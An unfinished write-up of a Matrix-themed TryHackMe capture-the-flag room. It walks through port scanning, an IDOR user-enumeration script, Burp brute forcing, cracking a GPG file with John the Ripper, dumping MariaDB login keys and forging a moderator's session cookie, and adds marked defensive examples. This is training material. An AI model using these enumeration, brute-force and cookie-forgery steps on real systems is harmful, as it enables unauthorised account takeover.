In this challenge, a short story is provided as the description, along with a machine and multiple questions. We need to solve the questions to complete the challenge.
**[email protected]:**
Most people only see a perfectly constructed system. But **you** have always been different. You see not only what is on the surface but also what governs beneath it; the internal correlating mechanisms that regulate and manage each of its modules almost so flawlessly that it attempts to conceal all minuscule holes in its multifaceted design. However, these holes still exist, don't they?... Yes, you are still learning, but your greatest weakness is that self-doubt... It continues to hold you back... Do you know where it comes from? Deep down, I know you do. You know something is not right, you just cannot put your finger on it. Well let me tell you. You are living in a dream. One that has been placed over your eyes to blind you from you realising who you could become. Yes… I can sense you know what I am telling you is true... The dilemma is that there are these '**agents**'... Let us call them programs that look like you and me. They seek to spread that virus of **self-doubt**, **disbelief**, and **fear** into the subconsciousness of the few emerging hackers with great potential. Why you ask? It is because minds like yours are a threat to those in control of the 'M4tr1x system'; the artificial, simulated world developed to suppress your full senses. We need you in this next war against the machines. But only you can escape from your engineered reality into the real world... I will be waiting on the other side.
**-------------------------------------------------------------------------------------------------------------------------------------------------------------------**
**[email protected]:**
Who are you?
Establishing the Connection
Step 1: Connect to the TryHackMe network using the command `sudo openvpn <file.ovpn>`.
Step 2: Start the machine provided in the challenge to obtain the target IP address.
Information Gathering
Let’s run a port scan against the target machine to find its open ports and the services behind them.
```
/cybersec/tryhackme ❯ nmap -sV -p- 10.49.184.94
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-04 17:45 +0545
Nmap scan report for 10.49.184.94
Host is up (0.053s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
3306/tcp open mysql MariaDB 5.5.5-10.3.39
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.62 seconds
```
We can see that three ports are open, running the ssh, http, and mysql services on ports 22, 80, and 3306 respectively.
Exploitation
Let’s open port 80 in a browser and see what is there.
Step 1: Register a new account on the system.
Verify the CAPTCHA to register successfully.
On the /memberlist.php page, we can see a list of members, and I found a user named whiterabbit.
Explore the posts and threads written by whiterabbit (aka willis), and you will find /bugbountyHQ.
You will get a form, but the input is disabled. So, I checked the page source using Ctrl + U and found a new directory: /reportPanel.php.
When we visit /reportPanel.php, it shows vulnerabilities reported by users. Among them is the latest vulnerability report by the user Edwards. According to him, anyone can perform a brute-force attack on the site because there is no time limit or CAPTCHA in the login mechanism. I also checked the source code of reportPanel.php and found something interesting, though I didn’t know what it was for yet.
```html
<p hidden>
Keymaker message:
1 16 5 18 13 21 20 1 20 9 15 14 15 6 15 14 12 25 20 8 5 5 14 7 12 9 19 8 12 5 20 20 5 18 19 23 9 12 12 15 16 5 14 20 8 5 12 15 3 11 19
1 4 4 18 5 19 19: /0100101101100101011110010110110101100001011010110110010101110010
</p>
```
To exploit the vulnerability suggested by Edwards, we need a list of users and passwords. We can use the passwords provided by Edwards in the report.
Save the passwords in a pass.txt file.
```
password123
Password123
crabfish
linux123
secret
piggybank
windowsxp
starwars
qwerty123
qwerty
supermario
Luisfactor05
james123
```
One more interesting thing I found was an IDOR vulnerability on the site. We can enumerate users using the uid parameter:
http://10.49.184.94/member.php?action=profile&uid=3
I wrote a small script to enumerate all users by exploiting this IDOR vulnerability. Run the script; it will save the usernames in the userlist.txt file.
```python
import re

import requests

base_url = 'http://10.48.176.173/member.php?action=profile&uid='

with open('userlist.txt', 'w') as f:
    for uid in range(1, 1000):  # adjust range as needed
        url = base_url + str(uid)
        try:
            r = requests.get(url, timeout=2)
        except requests.RequestException:
            continue  # skip UIDs whose request times out or fails
        # The profile page title carries the username
        match = re.search(r'<title>Linux-Bay - Profile of (.*?)</title>', r.text)
        if match:
            username = match.group(1).strip()
            print(f'[+] UID {uid}: {username}')
            f.write(username + '\n')
```
Now we have both the username list and the password list. Next, let’s perform a brute-force attack on http://10.49.184.94/member.php?action=login using Burp Suite. Open the site in the Burp browser or any browser with the proxy configured, and capture the traffic.
Capture the traffic using the proxy and send it to Intruder.
Select the Cluster Bomb attack type, upload the username and password lists as payloads, and start the attack.
ℹ️ Reminder:
The brute-force attack in Burp is going to take time, so please add time to the machine.
The attack is going to take a long time to obtain the credentials by brute-forcing the user, so I decided to work on the hidden code that we obtained earlier from /reportPanel.php. I noticed that:
1 4 4 18 5 19 19 => ADDRESS
This means it uses the A1Z26 cipher encoding, which is based on simple alphabetical order. Let’s decrypt the above text using CyberChef, and we get the final message:
apermutationofonlytheenglishletterswillopenthelocks
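The same decoding done offline, as an added example that is not part of the original write-up. It decodes the two A1Z26 lines from the hidden paragraph and also reads the bit string after "address" as 8-bit ASCII, a step the write-up does not take (it uses the bit string literally as the path). The function names are my own.

```python
import re

# Values copied from the hidden <p> on /reportPanel.php shown above.
KEYMAKER_MSG = ("1 16 5 18 13 21 20 1 20 9 15 14 15 6 15 14 12 25 20 8 5 5 14 7 12 9 19 8 "
                "12 5 20 20 5 18 19 23 9 12 12 15 16 5 14 20 8 5 12 15 3 11 19")
LABEL = "1 4 4 18 5 19 19"
ADDRESS_BITS = "0100101101100101011110010110110101100001011010110110010101110010"


def a1z26_decode(numbers: str) -> str:
    """Map 1..26 to a..z; reject out-of-range values instead of guessing."""
    out = []
    for token in re.split(r"[\s,\-]+", numbers.strip()):
        value = int(token)
        if not 1 <= value <= 26:
            raise ValueError(f"{token!r} is not an A1Z26 value")
        out.append(chr(ord("a") + value - 1))
    return "".join(out)


def bits_to_ascii(bits: str) -> str:
    """Read a bit string as consecutive 8-bit ASCII bytes."""
    if len(bits) % 8 or set(bits) - {"0", "1"}:
        raise ValueError("expected a multiple of 8 binary digits")
    data = bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))
    return data.decode("ascii")


if __name__ == "__main__":
    print(a1z26_decode(LABEL))          # label in front of the bit string
    print(a1z26_decode(KEYMAKER_MSG))   # the Keymaker hint
    print(bits_to_ascii(ADDRESS_BITS))  # the bit string read as text
```
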
Since the long digit string, 0100101101100101011110010110110101100001011010110110010101110010, is mentioned as an address, I visited it and got this:
When I checked the source code of the system, I got:
ℹ️ Info:
I am still confused about where we will need this information. Let’s continue with the brute-force task.
We can see a username and password combination with a different response length compared to normal traffic.
We can log in with those credentials. When we log in as ArnoldBagger, we get to know about the /devBuilds directory.
When I visited modManagerv2.plugin, I noticed a line suggesting a file that stores the SQL password.
We have a p.txt.gpg file, but it is encrypted. As per the previous message from the Keymaker,
a permutation of only the English letters will open the locks.
So, I copied the string mixed with Chinese and English characters from the source code and wrote a simple script that generates a wordlist using permutations of English letters and saves it in a perm.txt file.
```python
from itertools import permutations

# Your input string
text = "诶比西迪伊吉艾杰开哦o屁西迪伊吉杰开哦艾杰开f哦屁q西屁西迪伊吉艾杰开哦x屁西迪伊吉艾杰开哦屁西迪伊吉艾杰开v哦屁西迪伊吉艾杰西迪伊g吉艾杰提维"

# Step 1: Extract only English letters
english_chars = [c for c in text if c.isalpha() and c.isascii()]
print("English letters found:", ''.join(english_chars))

# Step 2: Open a file to save permutations
with open("perm.txt", "w") as file:
    # With no r argument, permutations() yields full-length permutations
    for p in permutations(english_chars):
        file.write(''.join(p) + '\n')

print("All permutations saved to perm.txt")
```
We have an encrypted file and a wordlist of passwords. Let’s try to decrypt the file using the popular tool John the Ripper.
```
…/tryhackme/matrix-acces ❯ gpg2john p.txt.gpg > hash
File p.txt.gpg
…/tryhackme/matrix-acces ❯ john --wordlist=perm.txt hash
Warning: detected hash type "gpg", but the string is also recognized as "gpg-opencl"
Use the "--format=gpg-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65011712 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
fvgoxq (?)
1g 0:00:00:26 DONE (2026-01-05 18:36) 0.03720g/s 7.886p/s 7.886c/s 7.886C/s fvxgoq..fvgoxq
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```
The password is fvgoxq.
```
…/tryhackme/matrix-acces ❯ gpg -d p.txt.gpg
gpg: AES256.CFB encrypted data
gpg: encrypted with 1 passphrase
myS3CR3TPa55 //SQL Password
```
We now have the user mod and the SQL password.
I tried to connect to SQL using these credentials, but it asked for SSL.
```
…/tryhackme/matrix-acces ❯ mysql -h 10.48.171.182 -u mod -p
mysql: Deprecated program name. It will be removed in a future release, use '/usr/bin/mariadb' instead
Enter password:
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it
```
So, I used an alternative way to connect to the MySQL server using MariaDB and got access.
```
…/tryhackme/matrix-acces ✗ mariadb -h 10.48.171.182 -u mod -p --ssl=FALSE
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 115
Server version: 10.3.39-MariaDB-0ubuntu0.20.04.2 Ubuntu 20.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
```
Check the existing databases on the server using the command show databases;.
```
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| modManagerv2 |
| mybb |
| mysql |
| performance_schema |
+--------------------+
5 rows in set (0.086 sec)
```
Among the existing databases, modManagerv2 seems interesting, as we know the modManagerV2 plugin is vulnerable. Let’s use it and check the existing tables.
```
MariaDB [(none)]> use modManagerv2
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [modManagerv2]> show tables ;
+------------------------+
| Tables_in_modManagerv2 |
+------------------------+
| members |
+------------------------+
```
We got the members table. Let’s read the data inside it.
```
MariaDB [modManagerv2]> select * from members;
+----------------+-----------------------------------------------------+
| user | login_key |
+----------------+-----------------------------------------------------+
| LucyRob | xa72nhg3opUxviKUZWbMAwmyOekaJOFTGjiJjfAMhPkeIjk2Ig |
| Wannabe_Hacker | LsVBnPTZGeUw6JkmMKFrzkSIUPu5TC0Nej8DAjwYXenQcCFEpv |
| batmanZero | TBTZq6GfniPvFfb2A3rA2mQoThcb5U7irVF5lLpr0L4cJcy5m9 |
| SandraJannit | 6V5H71ZnvoW0FFbXx97YsV9LSnT4mltu9XB1v8qPo2X2CvfWBS |
| biggieballo | 75mXme5o0eY2o68sqeGBlTDvZcyJKmBhxUAusxiv6b816QilCG |
| AimsGregger | Xj8nuWt5Xn9UYzpIha1q2Fk4GUjyrEPPbpchDCwnniUO0ZzZyf |
| BlackCat | JY1Avl8cqCMkIFprMxWbTxwf8dSkiv7GJHzlPDWJWWg9gnG3FB |
| Golderg | clkNBtIoKICfzm6joGE2lTUiF2T8sVUfhtb2Aksst8zTRK2842 |
| TonyMontana | 8CtllQvd9V2qqHv0ZSjUj3PzuTSD37pam4ld8YjlB7gDN0zVwE |
| CaseBrax | eHXBFESqEoE5Ba2gcOjD8oBMJcgNRkazcJOc8wQQ9mGVRpMdvU |
| Ellie | G9KY2siJp9OOymdCiQclQn9UhxL6rSpoA3MXHCDgvHCcrCOOuT |
| Sosaxvector | RURFzCfyEIBeTE3yzgQDY34zC9jWqiBwSnyzDooH33fSiYr9ci |
| PalacerKing | 49wrogyJpIQI834MlhDnDnbb3Zlm0tFehnpz8ftDroesKNGbAX |
| Anderson | lkJVgYjuKl9P4cg8WUb8XYlLsWKT4Zxl5sT9rgL2a2d5pgPU1w |
| CrazyChris | tpM9k17itNHwqqT7b1qpX8dMq5TK83knrDrYe6KmxgiztsS1QN |
| StaceyLacer | QD8HpoWWrvP1I7kC4fvTaEEunlUz2ABgFUG5Huj8nqeInlz7df |
| ArnoldBagger | OoTfmlJyJhdJiqHXucrvRueHvGhE6LnBi5ih27KLQBKfigQLud |
| Carl_Dee | 3mPkPyBRwo67MOrJCOW8JDorQ8FvLpuCnreGowYrMYymVvDDXr |
| Xavier | ZBs4Co6qovOGI7H9FOI1qPhURDOagvBUgdXo8gphst8DhIyukP |
+----------------+-----------------------------------------------------+
19 rows in set (0.055 sec)
```
Still, we didn’t know the answers to the other questions.
I noticed something when I checked the user cookies—they are made up of uid + login_key.
We have the login_key of every user, and we can easily find the uid of any user. This means we can log in as anyone using cookies. Let’s find the most powerful user to log in as.
Among them, I found bigpaul as an administrator of the linux-bay system, but we don’t have his login_key. So, I selected BlackCat, who is the SuperModerator of the system.
The uid of BlackCat is 7, and the login_key is:
JY1Avl8cqCMkIFprMxWbTxwf8dSkiv7GJHzlPDWJWWg9gnG3FB
So, the final cookie will be:
7_JY1Avl8cqCMkIFprMxWbTxwf8dSkiv7GJHzlPDWJWWg9gnG3FB
Let’s replace the cookies of the existing user with BlackCat’s cookies, refresh the browser, and get logged in as BlackCat.
Successfully logged in as BlackCat.
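Why a read-only look at the members table was enough to take over a session, and one way to close that gap, as an added example that is not the forum's or the plugin's own code. It assumes the cookie format described above (uid, underscore, login_key); the sample key, the in-memory dictionaries standing in for the database, and all function names are constructed for illustration.

```python
import hashlib
import hmac
import secrets

# Constructed sample value shaped like a login_key row; not taken from the target.
SAMPLE_LOGIN_KEY = "CONSTRUCTEDsampleLoginKey0123456789abcdefghijklmno"


def weak_check(cookie: str, db: dict) -> bool:
    """Scheme from the write-up: the cookie is '<uid>_<login_key>' and the
    database stores that same login_key verbatim."""
    uid, _, key = cookie.partition("_")
    row = db.get(uid)
    return row is not None and hmac.compare_digest(
        key.encode(), row["login_key"].encode())


def issue_token(uid: str, db: dict) -> str:
    """Hardened variant: the client gets a random token, the server keeps
    only its SHA-256 digest."""
    token = secrets.token_urlsafe(32)
    db[uid] = {"token_sha256": hashlib.sha256(token.encode()).hexdigest()}
    return f"{uid}_{token}"


def hardened_check(cookie: str, db: dict) -> bool:
    uid, _, token = cookie.partition("_")
    row = db.get(uid)
    if row is None:
        return False
    digest = hashlib.sha256(token.encode()).hexdigest()
    return hmac.compare_digest(digest, row["token_sha256"])


def demo() -> dict:
    weak_db = {"7": {"login_key": SAMPLE_LOGIN_KEY}}
    forged = f"7_{weak_db['7']['login_key']}"          # built from a DB read alone
    strong_db = {}
    real_cookie = issue_token("7", strong_db)
    replayed = f"7_{strong_db['7']['token_sha256']}"   # all a DB reader can build
    return {
        "weak_accepts_db_value": weak_check(forged, weak_db),
        "hardened_accepts_real_cookie": hardened_check(real_cookie, strong_db),
        "hardened_accepts_db_value": hardened_check(replayed, strong_db),
    }
```

With the hardened variant a leaked table row no longer doubles as a session cookie; rotating the token at each login and expiring it server-side limits how long a stolen cookie stays useful.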
We can see different files in BlackCat’s profile.
To be continued ...